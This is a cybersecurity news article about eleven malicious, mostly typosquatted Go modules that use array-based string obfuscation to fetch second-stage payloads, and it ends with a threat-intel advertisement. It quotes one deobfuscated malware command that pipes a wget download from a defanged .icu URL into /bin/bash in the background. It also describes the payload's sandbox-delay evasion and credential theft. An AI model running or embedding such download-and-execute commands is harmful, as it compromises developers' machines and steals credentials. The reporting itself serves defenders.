Threat Actors Weaponize Malicious Gopackages to Deliver Obfuscated Remote Payloads

Cybersecurity researchers have uncovered a sophisticated malware campaign targeting the Go ecosystem through eleven malicious packages that employ advanced obfuscation techniques to deliver second-stage payloads.

The campaign demonstrates a concerning evolution in supply chain attacks, leveraging the decentralized nature of Go’s module system to distribute malicious code that can compromise both Linux build servers and Windows workstations.

The malicious packages utilize identical index-based string obfuscation routines that conceal their true functionality from static analysis tools.

At runtime, the code silently spawns system shells and retrieves executable payloads from command and control servers hosted on interchangeable .icu and .tech domains.

Most concerning is that ten of these packages remain active on the Go Module registry, providing threat actors with persistent access to any development environment that imports them.

Socket.dev analysts identified that eight of the eleven packages are sophisticated typosquats of legitimate Go modules, carefully crafted to appear trustworthy to developers conducting routine dependency searches.

The researchers discovered that six of the ten malicious URLs remain reachable, indicating an active and ongoing threat to the software development community.

The attack vector exploits Go’s decentralized package management system, where modules are imported directly from GitHub repositories rather than through centralized registries like npm or PyPI.

This creates namespace confusion that attackers exploit by creating similarly named modules with different maintainers, making it challenging for developers to distinguish legitimate packages from malicious impostors.

Obfuscation and Payload Delivery Mechanism

The malware employs a consistent obfuscation technique across all packages, utilizing array-driven decoders to reconstruct malicious commands at runtime.

The obfuscated code follows a predictable pattern, establishing string arrays and calling different indices to construct system commands that download and execute remote payloads.

For example, the package github.com/expertsandba/opt contains obfuscated code that, when deobfuscated, executes: /bin/sh -c wget -O - https://monsoletter[.]icu/storage/de373d0df/a31546bf | /bin/bash &.

This command downloads a bash script directly into memory and executes it in the background without writing to disk, enabling stealthy payload delivery.

The second-stage payloads demonstrate sophisticated evasion techniques, implementing a one-hour sleep delay to circumvent sandbox analysis systems.

Once activated, the malware enumerates system information, harvests browser credentials, and establishes persistent backdoor access through continuous network beaconing to external command and control infrastructure.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial